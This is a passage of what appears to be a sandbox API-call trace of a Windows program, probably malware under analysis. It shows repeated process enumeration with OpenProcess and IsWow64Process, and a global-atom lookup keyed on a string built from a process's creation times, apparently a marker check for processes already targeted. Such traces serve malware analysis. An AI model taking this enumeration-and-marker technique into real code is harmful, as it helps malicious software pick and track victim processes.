	[0107.639] CloseHandle (hObject=0x694) returned 1
	[0107.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.639] CloseHandle (hObject=0x694) returned 1
	[0107.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.639] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.639] CloseHandle (hObject=0x694) returned 1
	[0107.639] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.640] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.640] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.640] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.640] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.641] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.641] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.641] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.641] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.641] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.641] CloseHandle (hObject=0x694) returned 1
	[0107.641] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.642] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.642] CloseHandle (hObject=0x694) returned 1
	[0107.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.642] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.642] CloseHandle (hObject=0x694) returned 1
	[0107.642] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.642] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.642] CloseHandle (hObject=0x694) returned 1
	[0107.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.716] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.717] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.718] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.719] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.719] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.719] CloseHandle (hObject=0x694) returned 1
	[0107.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.720] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.720] CloseHandle (hObject=0x694) returned 1
	[0107.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.720] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.720] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.721] CloseHandle (hObject=0x694) returned 1
	[0107.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.721] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.721] CloseHandle (hObject=0x694) returned 1
	[0107.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.721] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.721] CloseHandle (hObject=0x694) returned 1
	[0107.721] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.721] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.721] CloseHandle (hObject=0x694) returned 1
	[0107.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.722] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.722] CloseHandle (hObject=0x694) returned 1
	[0107.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.722] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.722] CloseHandle (hObject=0x694) returned 1
	[0107.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.722] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.722] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.722] CloseHandle (hObject=0x694) returned 1
	[0107.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.723] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.723] CloseHandle (hObject=0x694) returned 1
	[0107.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.723] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.723] CloseHandle (hObject=0x694) returned 1
	[0107.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.723] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.723] CloseHandle (hObject=0x694) returned 1
	[0107.723] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.723] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.723] CloseHandle (hObject=0x694) returned 1
	[0107.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.724] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.724] CloseHandle (hObject=0x694) returned 1
	[0107.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.724] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.724] CloseHandle (hObject=0x694) returned 1
	[0107.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.724] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.724] CloseHandle (hObject=0x694) returned 1
	[0107.724] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.725] CloseHandle (hObject=0x694) returned 1
	[0107.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.725] CloseHandle (hObject=0x694) returned 1
	[0107.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.725] CloseHandle (hObject=0x694) returned 1
	[0107.725] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.725] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.725] CloseHandle (hObject=0x694) returned 1
	[0107.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.726] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.726] CloseHandle (hObject=0x694) returned 1
	[0107.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.726] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.726] CloseHandle (hObject=0x694) returned 1
	[0107.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.726] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.726] CloseHandle (hObject=0x694) returned 1
	[0107.726] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.726] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.726] CloseHandle (hObject=0x694) returned 1
	[0107.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.727] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.727] CloseHandle (hObject=0x694) returned 1
	[0107.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.727] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.727] CloseHandle (hObject=0x694) returned 1
	[0107.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.727] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.727] CloseHandle (hObject=0x694) returned 1
	[0107.727] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.727] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.727] CloseHandle (hObject=0x694) returned 1
	[0107.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.728] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.728] CloseHandle (hObject=0x694) returned 1
	[0107.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.728] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.728] CloseHandle (hObject=0x694) returned 1
	[0107.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.728] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.728] CloseHandle (hObject=0x694) returned 1
	[0107.728] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.729] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.729] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.729] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.729] wsprintfA (in: param_1=0x3993b28, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.730] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.730] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.730] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.730] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.730] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.730] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.730] CloseHandle (hObject=0x694) returned 1
	[0107.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0107.730] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x694
	[0107.730] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.731] CloseHandle (hObject=0x694) returned 1
	[0107.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x694
	[0107.731] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.731] CloseHandle (hObject=0x694) returned 1
	[0107.731] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd50) returned 0x694
	[0107.731] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.731] CloseHandle (hObject=0x694) returned 1
	[0107.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0107.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0107.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0107.874] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0107.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0107.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0107.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0107.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0107.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0107.875] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0107.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0107.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0107.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0107.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0107.876] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0107.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0107.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0107.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0107.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x694
	[0107.877] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.877] CloseHandle (hObject=0x694) returned 1
	[0107.877] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0107.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0107.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x694
	[0107.878] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.878] CloseHandle (hObject=0x694) returned 1
	[0107.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0107.878] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x694
	[0107.878] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.878] CloseHandle (hObject=0x694) returned 1
	[0107.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x694
	[0107.879] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.879] CloseHandle (hObject=0x694) returned 1
	[0107.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x694
	[0107.879] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.879] CloseHandle (hObject=0x694) returned 1
	[0107.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x694
	[0107.879] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.879] CloseHandle (hObject=0x694) returned 1
	[0107.879] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x694
	[0107.880] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.880] CloseHandle (hObject=0x694) returned 1
	[0107.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x694
	[0107.880] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.880] CloseHandle (hObject=0x694) returned 1
	[0107.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0107.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x694
	[0107.880] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.880] CloseHandle (hObject=0x694) returned 1
	[0107.880] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x694
	[0107.881] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.881] CloseHandle (hObject=0x694) returned 1
	[0107.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x694
	[0107.881] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.881] CloseHandle (hObject=0x694) returned 1
	[0107.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x694
	[0107.881] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.881] CloseHandle (hObject=0x694) returned 1
	[0107.881] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x694
	[0107.881] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.882] CloseHandle (hObject=0x694) returned 1
	[0107.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x694
	[0107.882] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.882] CloseHandle (hObject=0x694) returned 1
	[0107.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x694
	[0107.882] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.882] CloseHandle (hObject=0x694) returned 1
	[0107.882] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x694
	[0107.882] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.882] CloseHandle (hObject=0x694) returned 1
	[0107.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x694
	[0107.883] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.883] CloseHandle (hObject=0x694) returned 1
	[0107.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x694
	[0107.883] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.883] CloseHandle (hObject=0x694) returned 1
	[0107.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x694
	[0107.883] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.883] CloseHandle (hObject=0x694) returned 1
	[0107.883] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x694
	[0107.883] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.883] CloseHandle (hObject=0x694) returned 1
	[0107.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x694
	[0107.884] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.884] CloseHandle (hObject=0x694) returned 1
	[0107.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x694
	[0107.884] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.884] CloseHandle (hObject=0x694) returned 1
	[0107.884] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x694
	[0107.884] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.884] CloseHandle (hObject=0x694) returned 1
	[0107.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x694
	[0107.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.885] CloseHandle (hObject=0x694) returned 1
	[0107.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x694
	[0107.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.885] CloseHandle (hObject=0x694) returned 1
	[0107.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x694
	[0107.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.885] CloseHandle (hObject=0x694) returned 1
	[0107.885] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x694
	[0107.885] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.885] CloseHandle (hObject=0x694) returned 1
	[0107.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x694
	[0107.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.886] CloseHandle (hObject=0x694) returned 1
	[0107.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x694
	[0107.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.886] CloseHandle (hObject=0x694) returned 1
	[0107.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x694
	[0107.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.886] CloseHandle (hObject=0x694) returned 1
	[0107.886] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.886] IsWow64Process (in: hProcess=0x694, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0107.886] CloseHandle (hObject=0x694) returned 1
	[0107.887] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x694
	[0107.887] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.887] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0107.887] GetProcessTimes (in: hProcess=0x694, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0107.887] wsprintfA (in: param_1=0x39937e0, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0107.888] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.888] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0107.888] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0107.888] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0107.888] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0107.888] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0107.889] CloseHandle (hObject=0x694) returned 1
	[0107.889] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
